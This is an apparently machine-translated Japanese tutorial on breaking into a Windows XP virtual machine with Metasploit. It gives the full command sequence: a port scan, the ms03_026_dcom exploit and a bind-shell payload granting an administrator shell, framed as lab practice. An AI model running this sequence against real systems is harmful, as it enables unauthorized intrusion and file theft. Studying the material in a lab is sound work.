Windows XPをハックする方法–Windows XPは古いオペレーティングシステムです。 実際、MicrosoftはこのOSの更新プログラムの発行を停止しました。 しかし、多くの人々はまだ自分のコンピュータ上でXPを使用しています。 このOSは将来のアップデートを取得しないため、既存の脆弱性はハッカーや侵入テスターに永遠に利用可能になります。
このセクションでは、Metasploitフレームワークを使用してWindows XPを攻撃する方法を教えます。 作成者は、Kali Linuxを使用しており、Windows XPを実行する仮想マシンがあることを前提としています。 仮想マシンを使用すると、単一のコンピュータ上で複数のオペレーティングシステム(この場合はKali LinuxおよびWindows XP)を実行できます。 YouTubeには仮想マシンに関する多くの教材があります。
仮想マシンを使用していることを確認します。 実際のWindows XPコンピュータ上でこのハッキング技術を実践すると、深刻な問題につながる可能性があります。 仮想マシンで何か悪いことが起こった場合は、いくつかのボタンを押すだけで再起動できます。 一方、実際のXPコンピュータを破壊すると、修理費用が発生する可能性があります。
Windows XPをハックする方法
あなたはそれにリンクされているコンピュータをハッキングする前に、ネットワークに侵入する必要があります。 ただし、このレッスンではネットワーク攻撃は必要ありません。 これは、XPオペレーティングシステムがKaliコンピュータにインストールされているためです。 したがって、XP仮想マシンはコンピュータネットワークに属します。
Windows XPコンピュータをハックするには、次の操作を実行する必要があります:
- Kali Linux OSでMetasploitフレームワークを起動します。
:
service postgresql start
このコマンドは、コンピュータ上のPostgreSQLをアクティブにします。 PostgreSQLはMetasploitのデータベースとして機能するため、プログラム自体を起動する前に最初に実行する必要があります。 今、タイプ:
service metasploit start
または
msfconsole
すべてを正しく行った場合、端末は次のようになります:
- ターゲットを見つけるには、Metasploitの”ポートスキャン”機能を使用します。
Metasploitフレームワークにはさまざまな補助ツールが付属しています。 ポートスキャンは、このフレームワークに存在する最高のツールの一つです。 このツールを使用すると、マシンのすべてのポートをスキャンできます。 それはあなたのターゲットの開いた港についての詳細情報を与えることができます。 あなたが知っているように、ポートはハッカーのための出入り口として機能します。 開いたポートは開いたドアです。
次のコマンドを入力してポートスキャンを有効にします:
use auxiliary/scanner/portscan/tcp
次のように入力して、使用可能なスキャンオプションを表示します:
show options
デフォルトでは、Port Scanはシステムに存在する各ポートをチェックします。 プロセス全体に長い時間がかかるため、これを発生させたくありません。 チェックするポートの範囲を指定するのが最善です。 ここに例があります:
set ports 1-600
ここで、ターゲットのIPアドレスを指定する必要があります。 この手順は、IPアドレスが異なる場合があるため、注意が必要です。 この例では、XP仮想マシンにアクセスし、コマンドプロンプトを起動する必要があります。 「Ipconfig」と入力し、マシンのIPアドレスを検索します。 仮想マシンのIPアドレスが192.168.62.122であると仮定しましょう。
Kali OSに戻り、次のように入力します:
set RHOSTS 192.168.62.122
プロセスを開始するには、”run”と入力します。 Metasploitは、仮想マシンに存在する開いているすべてのポートを表示します。 スキャンで開いているポートが表示されなかった場合は、XP OSに戻り、ファイアウォールをオフにします。 次に、スキャンを再度実行します。 スキャンが2つの開いているポートを検出したと仮定しましょう:135と445。
実際には、ターゲットのIPアドレスを知ることはできません。 つまり、ターゲットとそのIPアドレスを見つけるにはNMAPを使用する必要があります。
- エクスプロイトを検索します。
これは攻撃の最も重要な段階の1つです。 選択したターゲットで動作するエクスプロイトを見つける必要があります。 “戻る”と入力してポートスキャナを終了します。 Msfconsoleのメイン画面で、”search dcom”と入力します。 “Dcom”エクスプロイトは、XPコンピュータをハックするために使用できる最高のツールの一つです。
Metasploitはあなたの検索結果が表示されます。 “Exploit/windows/dcerpc/ms03_026_dcom”というモジュールを探し、その名前をコピーします。 次に、次のように入力します:
use exploit/windows/dcerpc/ms03_026_dcom
次のように入力して使用可能なオプションを表示します:
show options
ターゲットのIPアドレスを指定します。 ここにコードがあります:
set RHOST 192.168.62.122
あなたの攻撃のためのペイロードを選択してください。 ペイロードは、ターゲットの防御に違反した後に何が起こるかを決定します。 それは開いたターミナルを置くか、またはウイルスを植えるかもしれません。 Metasploitフレームワークには何千ものペイロードがあります。 現在の攻撃に適したペイロードを見つけるには、次のように入力します:
payloads
- このレッスンの理想的なペイロードは”windows/shell_bind_tcp”です。 このペイロードは、TCPポートを介してターゲット内のシェル(またはコマンドプロンプト)を開きます。 このペイロードを設定するには、次のように入力します:
set PAYLOAD windows/shell_bind_tcp
- 攻撃の各側面を指定したので、”run”と入力します。
Metasploitは、ターゲットコンピュータでシェルが開かれたことを通知します。 そのシェルは、ターゲットに対する管理者権限を与えます。 そのコンピュータからファイルをダウンロードしたり、プログラムを送信したりすることができます。 あなたがしたい場合は、コンピュータのスクリーンショットを取得することができます。
Windows Xp Getastraメソッドをハックする方法